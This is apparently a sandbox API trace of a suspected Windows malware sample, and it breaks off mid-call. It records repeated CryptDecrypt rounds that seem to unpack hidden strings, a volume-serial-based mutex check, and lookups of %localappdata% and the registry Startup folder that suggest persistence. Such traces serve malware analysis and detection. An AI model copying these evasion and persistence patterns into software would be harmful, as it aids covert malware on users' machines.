[0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x24) returned 0x2af1978 [0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0xd) returned 0x2af19a8 [0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x17) returned 0x2af19c0 [0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x2b) returned 0x2af19e0 [0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x15) returned 0x2af1a18 [0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x17) returned 0x2af1a38 [0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x22) returned 0x2af1a58 [0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0xe) returned 0x2af1a88 [0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0xc1) returned 0x2af1aa0 [0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x3e) returned 0x2af1b70 [0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1b) returned 0x2af1bb8 [0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1d) returned 0x2af1be0 [0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x48) returned 0x2af1c08 [0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x12) returned 0x2af1c58 [0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x18) returned 0x2af1c78 [0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1b) returned 0x2af1c98 [0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x24) returned 0x2af1cc0 [0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x29) returned 0x2af1cf0 [0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1d28 [0034.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x69) returned 0x2af1d50 [0034.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x17) returned 0x2af1dc8 [0034.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0xf) returned 0x2af1de8 [0034.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x16) returned 0x2af1e00 [0034.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x28) returned 0x2af1e20 [0034.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x27) returned 0x2af1e50 [0034.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x12) returned 0x2af1e80 [0034.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x21) returned 0x2af1ea0 [0034.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x10) returned 0x2af1ed0 [0034.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1c) returned 0x2af1ee8 [0034.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x12) returned 0x2af1f10 [0034.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0fd0 | out: hHeap=0x2af0000) returned 1 [0034.818] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0034.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x80) returned 0x2af1f30 [0034.818] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x9b81f6) returned 0x0 [0034.818] RtlSizeHeap (HeapHandle=0x2af0000, Flags=0x0, MemoryPointer=0x2af1f30) returned 0x80 [0034.818] GetLastError () returned 0x0 [0034.818] SetLastError (dwErrCode=0x0) [0034.819] GetLastError () returned 0x0 [0034.819] SetLastError (dwErrCode=0x0) [0034.819] GetLastError () returned 0x0 [0034.819] SetLastError (dwErrCode=0x0) [0034.819] GetLastError () returned 0x0 [0034.819] SetLastError (dwErrCode=0x0) [0034.819] GetLastError () returned 0x0 [0034.819] SetLastError (dwErrCode=0x0) [0034.819] GetLastError () returned 0x0 [0034.819] SetLastError (dwErrCode=0x0) [0034.819] GetLastError () returned 0x0 [0034.819] SetLastError (dwErrCode=0x0) [0034.819] GetLastError () returned 0x0 [0034.819] SetLastError (dwErrCode=0x0) [0034.819] GetLastError () returned 0x0 [0034.819] SetLastError (dwErrCode=0x0) [0034.819] GetLastError () returned 0x0 [0034.819] SetLastError (dwErrCode=0x0) [0034.819] GetLastError () returned 0x0 [0034.819] SetLastError (dwErrCode=0x0) [0034.819] GetLastError () returned 0x0 [0034.819] SetLastError (dwErrCode=0x0) [0034.819] GetLastError () returned 0x0 [0034.819] SetLastError (dwErrCode=0x0) [0034.819] GetLastError () returned 0x0 [0034.819] SetLastError (dwErrCode=0x0) [0034.819] GetLastError () returned 0x0 [0034.819] SetLastError (dwErrCode=0x0) [0034.819] GetLastError () returned 0x0 [0034.820] SetLastError (dwErrCode=0x0) [0034.820] GetLastError () returned 0x0 [0034.820] SetLastError (dwErrCode=0x0) [0034.820] GetLastError () returned 0x0 [0034.820] SetLastError (dwErrCode=0x0) [0034.820] GetLastError () returned 0x0 [0034.820] SetLastError (dwErrCode=0x0) [0034.820] GetLastError () returned 0x0 [0034.820] SetLastError (dwErrCode=0x0) [0034.820] GetLastError () returned 0x0 [0034.820] SetLastError (dwErrCode=0x0) [0034.820] GetLastError () returned 0x0 [0034.820] SetLastError (dwErrCode=0x0) [0034.820] GetLastError () returned 0x0 [0034.820] SetLastError (dwErrCode=0x0) [0034.820] GetLastError () returned 0x0 [0034.820] SetLastError (dwErrCode=0x0) [0034.820] GetLastError () returned 0x0 [0034.820] SetLastError (dwErrCode=0x0) [0034.820] GetLastError () returned 0x0 [0034.820] SetLastError (dwErrCode=0x0) [0034.820] GetLastError () returned 0x0 [0034.820] SetLastError (dwErrCode=0x0) [0034.820] GetLastError () returned 0x0 [0034.820] SetLastError (dwErrCode=0x0) [0034.820] GetLastError () returned 0x0 [0034.820] SetLastError (dwErrCode=0x0) [0034.820] GetLastError () returned 0x0 [0034.821] SetLastError (dwErrCode=0x0) [0034.821] GetLastError () returned 0x0 [0034.821] SetLastError (dwErrCode=0x0) [0034.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2af0fd0 [0034.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2420) returned 0x2af1fb8 [0034.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x174) returned 0x2af1008 [0034.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af1188 [0034.821] CryptAcquireContextW (in: phProv=0x9bfcf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x9bfcf0*=0xe843e0) returned 1 [0034.832] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff608, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff670 | out: phKey=0xcff670*=0xe929b0) returned 1 [0034.832] CryptSetKeyParam (hKey=0xe929b0, dwParam=0x1, pbData=0xcff658, dwFlags=0x0) returned 1 [0034.832] CryptDecrypt (in: hKey=0xe929b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1188, pdwDataLen=0xcff624 | out: pbData=0x2af1188, pdwDataLen=0xcff624) returned 1 [0034.833] CryptDestroyKey (hKey=0xe929b0) returned 1 [0034.833] GetTickCount () returned 0x1ec8d [0034.833] GetLastError () returned 0x0 [0034.833] SetLastError (dwErrCode=0x0) [0034.833] GetLocaleInfoW (in: Locale=0x800, LCType=0x58, lpLCData=0xcff694, cchData=32 | out: lpLCData="\x03") returned 16 [0034.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1c) returned 0x2af11a0 [0034.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1c) returned 0x2af11c8 [0034.833] GetVersion () returned 0x23f00206 [0034.833] GetCurrentProcess () returned 0xffffffff [0034.833] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xcff67c | out: TokenHandle=0xcff67c*=0x1d0) returned 1 [0034.833] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x14, TokenInformation=0xcff674, TokenInformationLength=0x4, ReturnLength=0xcff678 | out: TokenInformation=0xcff674, ReturnLength=0xcff678) returned 1 [0034.833] CloseHandle (hObject=0x1d0) returned 1 [0034.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af11f0 [0034.834] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff570, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff5d8 | out: phKey=0xcff5d8*=0xe929b0) returned 1 [0034.834] CryptSetKeyParam (hKey=0xe929b0, dwParam=0x1, pbData=0xcff5c0, dwFlags=0x0) returned 1 [0034.834] CryptDecrypt (in: hKey=0xe929b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af11f0, pdwDataLen=0xcff58c | out: pbData=0x2af11f0, pdwDataLen=0xcff58c) returned 1 [0034.834] CryptDestroyKey (hKey=0xe929b0) returned 1 [0034.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1218 [0034.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1240 [0034.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af1268 [0034.834] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff548, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff5b0 | out: phKey=0xcff5b0*=0xe92270) returned 1 [0034.834] CryptSetKeyParam (hKey=0xe92270, dwParam=0x1, pbData=0xcff598, dwFlags=0x0) returned 1 [0034.834] CryptDecrypt (in: hKey=0xe92270, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1268, pdwDataLen=0xcff564 | out: pbData=0x2af1268, pdwDataLen=0xcff564) returned 1 [0034.834] CryptDestroyKey (hKey=0xe92270) returned 1 [0034.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1268 | out: hHeap=0x2af0000) returned 1 [0034.834] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1218, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0034.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1240 | out: hHeap=0x2af0000) returned 1 [0034.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af11f0 | out: hHeap=0x2af0000) returned 1 [0034.834] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xcff618, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xcff618*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0034.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1218 | out: hHeap=0x2af0000) returned 1 [0034.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af11f0 [0034.834] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff5a4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff60c | out: phKey=0xcff60c*=0xe926b0) returned 1 [0034.834] CryptSetKeyParam (hKey=0xe926b0, dwParam=0x1, pbData=0xcff5f4, dwFlags=0x0) returned 1 [0034.834] CryptDecrypt (in: hKey=0xe926b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af11f0, pdwDataLen=0xcff5c0 | out: pbData=0x2af11f0, pdwDataLen=0xcff5c0) returned 1 [0034.834] CryptDestroyKey (hKey=0xe926b0) returned 1 [0034.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af1238 [0034.834] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x1d0 [0034.834] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0x0) returned 0x102 [0034.834] CloseHandle (hObject=0x1d0) returned 1 [0034.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af11f0 | out: hHeap=0x2af0000) returned 1 [0034.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1238 | out: hHeap=0x2af0000) returned 1 [0034.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af11f0 [0034.835] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff584, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff5ec | out: phKey=0xcff5ec*=0xe929b0) returned 1 [0034.835] CryptSetKeyParam (hKey=0xe929b0, dwParam=0x1, pbData=0xcff5d4, dwFlags=0x0) returned 1 [0034.835] CryptDecrypt (in: hKey=0xe929b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af11f0, pdwDataLen=0xcff5a0 | out: pbData=0x2af11f0, pdwDataLen=0xcff5a0) returned 1 [0034.835] CryptDestroyKey (hKey=0xe929b0) returned 1 [0034.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1218 [0034.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1240 [0034.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af1268 [0034.835] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff55c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff5c4 | out: phKey=0xcff5c4*=0xe926b0) returned 1 [0034.835] CryptSetKeyParam (hKey=0xe926b0, dwParam=0x1, pbData=0xcff5ac, dwFlags=0x0) returned 1 [0034.835] CryptDecrypt (in: hKey=0xe926b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1268, pdwDataLen=0xcff578 | out: pbData=0x2af1268, pdwDataLen=0xcff578) returned 1 [0034.835] CryptDestroyKey (hKey=0xe926b0) returned 1 [0034.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1268 | out: hHeap=0x2af0000) returned 1 [0034.835] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1218, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0034.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1240 | out: hHeap=0x2af0000) returned 1 [0034.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af11f0 | out: hHeap=0x2af0000) returned 1 [0034.835] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xcff62c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xcff62c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0034.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1218 | out: hHeap=0x2af0000) returned 1 [0034.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af11f0 [0034.835] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff5b8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff620 | out: phKey=0xcff620*=0xe923b0) returned 1 [0034.835] CryptSetKeyParam (hKey=0xe923b0, dwParam=0x1, pbData=0xcff608, dwFlags=0x0) returned 1 [0034.835] CryptDecrypt (in: hKey=0xe923b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af11f0, pdwDataLen=0xcff5d4 | out: pbData=0x2af11f0, pdwDataLen=0xcff5d4) returned 1 [0034.835] CryptDestroyKey (hKey=0xe923b0) returned 1 [0034.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af1238 [0034.835] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x0 [0034.835] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\0115B419773000") returned 0x1d0 [0034.835] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0x0) returned 0x0 [0034.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af11f0 | out: hHeap=0x2af0000) returned 1 [0034.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1238 | out: hHeap=0x2af0000) returned 1 [0034.835] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x9b2019, lpParameter=0xcff6f4, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1f8 [0034.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2af11f0 [0034.836] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff5c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff630 | out: phKey=0xcff630*=0xe929b0) returned 1 [0034.836] CryptSetKeyParam (hKey=0xe929b0, dwParam=0x1, pbData=0xcff618, dwFlags=0x0) returned 1 [0034.836] CryptDecrypt (in: hKey=0xe929b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af11f0, pdwDataLen=0xcff5e4 | out: pbData=0x2af11f0, pdwDataLen=0xcff5e4) returned 1 [0034.836] CryptDestroyKey (hKey=0xe929b0) returned 1 [0034.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af1258 [0034.836] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff5a0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff608 | out: phKey=0xcff608*=0xe92330) returned 1 [0034.836] CryptSetKeyParam (hKey=0xe92330, dwParam=0x1, pbData=0xcff5f0, dwFlags=0x0) returned 1 [0034.836] CryptDecrypt (in: hKey=0xe92330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1258, pdwDataLen=0xcff5bc | out: pbData=0x2af1258, pdwDataLen=0xcff5bc) returned 1 [0034.836] CryptDestroyKey (hKey=0xe92330) returned 1 [0034.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1280 [0034.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af12a8 [0034.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af12d0 [0034.836] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff578, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff5e0 | out: phKey=0xcff5e0*=0xe92770) returned 1 [0034.836] CryptSetKeyParam (hKey=0xe92770, dwParam=0x1, pbData=0xcff5c8, dwFlags=0x0) returned 1 [0034.836] CryptDecrypt (in: hKey=0xe92770, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af12d0, pdwDataLen=0xcff594 | out: pbData=0x2af12d0, pdwDataLen=0xcff594) returned 1 [0034.836] CryptDestroyKey (hKey=0xe92770) returned 1 [0034.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af12d0 | out: hHeap=0x2af0000) returned 1 [0034.836] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x2af1280, nSize=0xf | out: lpDst="") returned 0x1e [0034.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af12a8 | out: hHeap=0x2af0000) returned 1 [0034.836] RtlReAllocateHeap (Heap=0x2af0000, Flags=0x0, Ptr=0x2af1280, Size=0x3a) returned 0x2af1280 [0034.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3a) returned 0x2af12c8 [0034.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af1310 [0034.836] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff574, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff5dc | out: phKey=0xcff5dc*=0xe92330) returned 1 [0034.836] CryptSetKeyParam (hKey=0xe92330, dwParam=0x1, pbData=0xcff5c4, dwFlags=0x0) returned 1 [0034.836] CryptDecrypt (in: hKey=0xe92330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1310, pdwDataLen=0xcff590 | out: pbData=0x2af1310, pdwDataLen=0xcff590) returned 1 [0034.836] CryptDestroyKey (hKey=0xe92330) returned 1 [0034.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1310 | out: hHeap=0x2af0000) returned 1 [0034.837] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x2af1280, nSize=0x1d | out: lpDst="") returned 0x1e [0034.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af12c8 | out: hHeap=0x2af0000) returned 1 [0034.837] RtlReAllocateHeap (Heap=0x2af0000, Flags=0x0, Ptr=0x2af1280, Size=0x72) returned 0x2af1280 [0034.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x72) returned 0x2af1300 [0034.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af1380 [0034.837] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff574, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff5dc | out: phKey=0xcff5dc*=0xe927b0) returned 1 [0034.837] CryptSetKeyParam (hKey=0xe927b0, dwParam=0x1, pbData=0xcff5c4, dwFlags=0x0) returned 1 [0034.837] CryptDecrypt (in: hKey=0xe927b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1380, pdwDataLen=0xcff590 | out: pbData=0x2af1380, pdwDataLen=0xcff590) returned 1 [0034.837] CryptDestroyKey (hKey=0xe927b0) returned 1 [0034.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1380 | out: hHeap=0x2af0000) returned 1 [0034.837] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x2af1280, nSize=0x39 | out: lpDst="C:\\Users\\FD1HVy\\AppData\\Local") returned 0x1e [0034.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1300 | out: hHeap=0x2af0000) returned 1 [0034.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1258 | out: hHeap=0x2af0000) returned 1 [0034.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1300 [0034.837] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff59c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff604 | out: phKey=0xcff604*=0xe926f0) returned 1 [0034.837] CryptSetKeyParam (hKey=0xe926f0, dwParam=0x1, pbData=0xcff5ec, dwFlags=0x0) returned 1 [0034.837] CryptDecrypt (in: hKey=0xe926f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1300, pdwDataLen=0xcff5b8 | out: pbData=0x2af1300, pdwDataLen=0xcff5b8) returned 1 [0034.837] CryptDestroyKey (hKey=0xe926f0) returned 1 [0034.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x3e) returned 0x2af1348 [0034.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3e) returned 0x2af1390 [0034.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af13d8 [0034.837] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff574, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff5dc | out: phKey=0xcff5dc*=0xe929b0) returned 1 [0034.837] CryptSetKeyParam (hKey=0xe929b0, dwParam=0x1, pbData=0xcff5c4, dwFlags=0x0) returned 1 [0034.837] CryptDecrypt (in: hKey=0xe929b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af13d8, pdwDataLen=0xcff590 | out: pbData=0x2af13d8, pdwDataLen=0xcff590) returned 1 [0034.837] CryptDestroyKey (hKey=0xe929b0) returned 1 [0034.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x10) returned 0x2af1258 [0034.837] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0xcff558 | out: phkResult=0xcff558*=0x200) returned 0x0 [0034.837] RegQueryValueExW (in: hKey=0x200, lpValueName="Startup", lpReserved=0x0, lpType=0xcff554, lpData=0x2af1390, lpcbData=0xcff55c*=0x3e | out: lpType=0xcff554*=0x2, lpData=0x2af1390*=0xe0, lpcbData=0xcff55c*=0x98) returned 0xea [0034.837] RegCloseKey (hKey=0x200) returned 0x0 [0034.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1258 | out: hHeap=0x2af0000) returned 1 [0034.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af13d8 | out: hHeap=0x2af0000) returned 1 [0034.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1390 | out: hHeap=0x2af0000) returned 1 [0034.837] RtlReAllocateHeap (Heap=0x2af0000, Flags=0x0, Ptr=0x2af1348, Size=0x7a) returned 0x2af1348 [0034.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7a) returned 0x2af13d0 [0034.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af1458 [0034.837] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff570, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff5d8 | out: phKey=0xcff5d8*=0xe925b0) returned 1 [0034.838] CryptSetKeyParam (hKey=0xe925b0, dwParam=0x1, pbData=0xcff5c0, dwFlags=0x0) returned 1 [0034.838] CryptDecrypt (in: hKey=0xe925b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1458, pdwDataLen=0xcff58c | out: pbData=0x2af1458, pdwDataLen=0xcff58c) returned 1 [0034.838] CryptDestroyKey (hKey=0xe925b0) returned 1 [0034.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x10) returned 0x2af1258 [0034.838] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0xcff554 | out: phkResult=0xcff554*=0x200) returned 0x0 [0034.838] RegQueryValueExW (in: hKey=0x200, lpValueName="Startup", lpReserved=0x0, lpType=0xcff550, lpData=0x2af13d0, lpcbData=0xcff558*=0x7a | out: lpType=0xcff550*=0x2, lpData=0x2af13d0*=0xe0, lpcbData=0xcff558*=0x98) returned 0xea [0034.838] RegCloseKey (hKey=0x200) returned 0x0 [0034.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1258 | out: hHeap=0x2af0000) returned 1 [0034.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1458 | out: hHeap=0x2af0000) returned 1 [0034.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af13d0 | out: hHeap=0x2af0000) returned 1 [0034.838] RtlReAllocateHeap (Heap=0x2af0000, Flags=0x0, Ptr=0x2af1348, Size=0xf2) returned 0x2af1348 [0034.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf2) returned 0x2af43e0 [0034.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af1448 [0034.838] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff570, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff5d8 | out: phKey=0xcff5d8*=0xe929b0) returned 1 [0034.838] CryptSetKeyParam (hKey=0xe929b0, dwParam=0x1, pbData=0xcff5c0, dwFlags=0x0) returned 1 [0034.838] CryptDecrypt (in: hKey=0xe929b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1448, pdwDataLen=0xcff58c | out: pbData=0x2af1448, pdwDataLen=0xcff58c) returned 1 [0034.838] CryptDestroyKey (hKey=0xe929b0) returned 1 [0034.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x10) returned 0x2af1258 [0034.838] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, 